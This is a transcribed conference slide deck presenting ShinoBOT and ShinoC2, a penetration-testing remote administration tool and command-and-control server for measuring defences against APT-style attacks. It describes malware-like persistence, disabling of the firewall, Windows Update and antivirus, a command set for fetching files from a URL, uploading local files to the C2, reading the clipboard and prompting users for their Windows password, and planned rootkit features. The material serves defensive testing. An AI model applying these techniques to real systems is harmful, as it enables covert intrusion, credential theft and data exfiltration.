Transcription
ShinoBOTShinoC2Can you prevent APT like me?- the pentest tool to measure the defense against APT/RAT -Author: Shota Shinogi1
whoamiName: Shota Shinogi pronounce: ʃota ʃinogi@sh1n0g1work in the Security Research Centerof Macnica Networks Corp., Japan.a Japanese disty of security productsmy carrer of security20042007200920102011I’mhere2013HDD Encryption(SafeBoot)Personal Firewall(Sygate)Host DLP(McAfee Host DLP)Network IPS(McAfee NSP)Web App Firewall(Citrix Netscaler)SecurityResearcher(not product oriented)2
strings ShinoBOT.exeRemote Administration ToolIt connects to ShinoC2; the C&C server, every 10 sec.If it get any jobs, it does it immediately.Supported PlatformWindows XP/Vista/7 ( .net framework 2.x)Windows 8, not fully tested yet Acts like a malwareBefore doing the job received from ShinoC2, it acts a little bit like amalware.Copy itself in the user home directory C: Users %user% ShinoBOT.exeAdd the registry (to start everytime on booting).HKCU Software Microsoft Windows Current Version RunDisable Windows FirewallStop Windows Update serviceStop the service of McAfee, Symantec Antivirus3
whois ShinoC2ShinoC2 is the Command & Controlserver for ShinoBOT.You (red team) can create a job andsend it to your ShinoBOT-affecteddevices.It has a web GUI so you canmanipulate by your favorite browser,smart device, etc.ShinoBOTAccess/Send ResultsShinoC2Command4
more purpose of ShinoBOT ShinoC2.txtThe steps before “Install” of Kill Chain. called PRECOMPROMISED phasePhaseAttacker’s ActivityHow to preventRecon Social EngineeringCollectiong info from SNS, press release more and more User Educationhow about fool users(sigh)Weaponization Using PackerXOR Cryptetc for evade AV/IPS IPS/AVefficient only for the known Delivery Send by emailDrive By Download Gateway Antivirusefficient only for the known Exploit Attack the vulnerabililty of IE,Adobe,Java,etc. Patches, patches, patches how about the zero day attacks?It is very difficult to prevent those steps perfectly.So we have to consider how to prevent the followingstep 5
tail purpose of ShinoBOT ShinoC2.txtThe following steps called POST-COMPROMISEDwhich covered by ShinoBOTPhaseAttacker’s ActivityInstall Install RATC&C Connect to C&CActions onObjective Critical data exfiltrationCoverage of ShinoBOTShinoBOTYou can use ShinoBOT/ShinoC2 to test yourenvironment to know what’s happen after thesuccess of zero day attacks.6
man ShinoBOTHow to setup一. Download ShinoBOT二. Run ShinoBOT三. That’s all.How to use一.二.三.四.Access to ShinoC2Click the [HOST] link. Your host will be there.Click [Assign Job]Select the job you want to run on your host.(you can also create your job, see the slide “man ShinoC2:job”)五.六.七.八.Enter the password provided from the GUI of ShinoBOTPress [Assign] button.Wait 10 seconds.You job will be done.7
�ずSeeing is believing8
SBOTshot:ShinoBOT GUI It has a GUI ?Yes, ShinoBOT is not a tool for the bad people. So I made ShinoBOT not tobecome silent. This is also the reason why you need the password to send thejob.9
SBOTshot:ShinoC210
man ShinoC2 job page1You can create your own job by the job menu11
man ShinoC2 job page2The “command” will be redirected to cmd.exe exceptthose special commands.CommandsNotesExamplesSBOTshotTake a screen shotSBOTshotSBOTwgetDownload a fileSBOTwget:http://www.xxx/aaa.exeSBOTfgetUpload the local file to C2SBOTfget:C: boot.iniSBOTrunARun a process asynchronous*it means ShinoBOT will not waituntil the process end.SBOTrunA:notepad.exeSBOTmboxShow a message boxSBOTmbox:hello thereSBOTiboxShow an input box ( you can asksomething to the user )SBOTibox:input your windowspasswordSBOTexitKill ShinoBOTSBOTexitSBOTclpbGet the data from clibboardSBOTclpb*All command are case sensitive.12
vim RoadmapComing soon Take a snapshot from the webcam.Encrypt the C&C channel, not using SSL.Encrypt strings in the binary.Hide itselft by a kernel driver. (become a root-kit)13
Personal Firewall (Sygate) 2009 Host DLP (McAfee Host DLP) 2010 Network IPS (McAfee NSP) 2011 Web App Firewall (Citrix Netscaler) I’m here 2013 a Japanese disty of security products Security Researcher (not product orie
